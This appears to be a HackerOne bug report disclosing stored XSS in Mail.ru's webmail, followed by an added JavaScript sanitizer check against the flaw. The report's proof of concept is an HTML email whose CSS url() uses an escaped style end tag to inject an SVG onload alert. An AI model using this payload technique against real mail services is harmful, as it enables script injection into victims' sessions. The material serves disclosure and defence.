Mail.ru: Stored XSS when you read emails. <style>

2017-10-05T17:47:25
ID H1:274844
Type hackerone
Reporter ras-it
Modified 2018-03-13T13:17:40

Description

Hello team, I have found stored XSS when you read emails via <style> html tag.

PoC:

```
<!DOCTYPE html>
<html>
<head>
<style>
div {
    background-image: url("data:image/jpg;base64,<\/style><svg/onload=alert(document.domain)>");
    background-color: #cccccc;
}
</style>
</head>
<body>

<div>lol</div>

</body>
</html>
```

{F226715}
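The report does not state the root cause. The following is an added example, not code from the report or from Mail.ru: assuming the mail sanitizer decodes CSS backslash escapes when it rewrites a style block (so `<\/style>` would be written back as a real end tag), it shows a check a sanitizer can run on CSS text before placing it inside a `<style>` element. The function names and the sample input are hypothetical.

```javascript
// Added example: names and sample input are hypothetical / constructed.
// Assumption: the sanitizer decodes CSS escapes before re-serialising <style> text.

// Simplified CSS escape decoding: "\" + 1-6 hex digits (+ one optional
// whitespace) becomes that code point; "\" + any other character becomes
// the character itself, so "\/" decodes to "/".
function decodeCssEscapes(css) {
  const re = /\\([0-9a-fA-F]{1,6})[ \t\n\r\f]?|\\([^\n\r\f])/g;
  return css.replace(re, (match, hex, ch) => {
    if (hex === undefined) return ch;
    const cp = parseInt(hex, 16);
    const invalid = cp === 0 || cp > 0x10ffff || (cp >= 0xd800 && cp <= 0xdfff);
    return invalid ? "\uFFFD" : String.fromCodePoint(cp);
  });
}

// <style> is a raw-text element: the HTML parser ends it at the first
// "</style", whatever CSS string or url() that sequence sits in.
const STYLE_END = /<\/style/i;

// Classify CSS text that is about to be written into a <style> element.
function checkStyleText(css) {
  if (STYLE_END.test(css)) return "reject: raw end tag";
  if (STYLE_END.test(decodeCssEscapes(css))) {
    return "reject: end tag after escape decoding";
  }
  return "ok";
}

// Constructed sample modelled on the report's CSS; the markup after the
// escaped end tag is replaced by a harmless placeholder.
const SAMPLE = String.raw`div { background-image: url("data:image/jpg;base64,<\/style><i>x</i>"); }`;

console.log(checkStyleText(SAMPLE));
console.log(checkStyleText("div { background-color: #cccccc; }"));
```

The check runs on both the raw and the decoded text because either form can reach the output, depending on whether the sanitizer passes CSS through untouched or normalizes it first.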